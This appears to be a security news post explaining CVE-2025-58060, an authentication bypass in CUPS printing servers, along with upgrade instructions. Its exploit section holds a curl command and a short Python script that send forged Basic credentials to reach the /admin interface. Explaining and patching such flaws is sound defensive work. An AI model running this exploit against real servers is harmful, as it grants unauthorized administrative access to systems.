CVE CyberSecurity Database News

CVE-2025-58060 - Critical Authentication Bypass in OpenPrinting CUPS (How It Works, Exploit Details, and Fix)

Poster -

OpenPrinting CUPS (Common UNIX Printing System) is a widely used open-source printing server found in nearly every major Linux and UNIX system. In early 2025, a critical vulnerability was discovered that allowed attackers to bypass authentication and access protected resources with ease. In this post, we’ll break down CVE-2025-58060—its cause, consequences, how it can be exploited, and, most importantly, how you can fix it.

What is CVE-2025-58060?

A security flaw was found in CUPS versions 2.4.12 and earlier. If the CUPS server is configured with AuthType set to anything OTHER than Basic (for example, Digest, Negotiate or OAuth), but a client sends an HTTP request with the header Authorization: Basic ..., CUPS does not actually check the password at all. This means anyone can log in—even without providing a valid password!

Perform other sensitive operations without proper authentication

*Note:* This affects ANY configuration that uses authentication types other than Basic (the default is usually Basic, but many admins harden this for better security).

Let’s look at some example configuration

<Location /admin>
  AuthType Digest
  Require user @SYSTEM
</Location>

You intend to use Digest authentication for all requests to /admin. But if someone sends a request like this:

GET /admin HTTP/1.1
Host: cups-server
Authorization: Basic dXNlcjpwYXNzd29yZA==

CUPS does NOT check any credentials at all. Regardless of the username or password provided (even totally fake), access will succeed. In other words, sending any Authorization: Basic ... header disables password checking!

Exploit Details

This bug can be abused using curl, web browsers, or any custom HTTP client.

Example: Exploiting with curl

Suppose you want to access the CUPS admin interface without credentials.

Assume cups-server is the hostname

curl -v --user fakeuser:fakepass http://cups-server:631/admin

Even though the server expects Digest (or something else), *any* Basic credentials will be accepted because the server won’t actually validate them.

How does this work?

Under the hood, the server’s faulty logic only checks passwords if AuthType Basic is configured. If not, but the request *still* has a Authorization: Basic header, no password checking happens at all.

Here’s a Python code snippet to automate the attack

import requests
from base64 import b64encode

target = 'http://cups-server:631/admin'
username = 'attacker'
password = 'doesnotmatter'

headers = {
    'Authorization': 'Basic ' + b64encode(f"{username}:{password}".encode()).decode()
}

resp = requests.get(target, headers=headers)
if resp.status_code == 200:
    print("[+] Authentication bypassed, you have admin access!")
else:
    print("[-] Exploit failed, server may be patched.")

Mitigation and Fix

Upgrade to CUPS 2.4.13 or later.
Developers fixed this bug in commit 7ae8abb, included in version 2.4.13 and above. The fix ensures that improper mixing of AuthTypes does not result in weak bypasses.

For Ubuntu/Debian-based systems

sudo apt update
sudo apt install cups

For Fedora/RHEL

sudo dnf update cups

or download the latest directly from OpenPrinting CUPS releases.

- CVE-2025-58060 at MITRE
- OpenPrinting CUPS 2.4.13 release notes
- Relevant GitHub commit fix
- Original bug report and discussion
- Security advisory by OpenPrinting

Summary

CVE-2025-58060 is a critical vulnerability affecting many CUPS installations, allowing complete authentication bypass when certain configurations are used. If your organization relies on CUPS for printing, update to 2.4.13 or later without delay!

Protect your printers. Patch now.
*Questions or comments? Let us know below!*

Timeline

Published on: 09/11/2025 18:15:34 UTC
Last modified on: 11/04/2025 22:16:32 UTC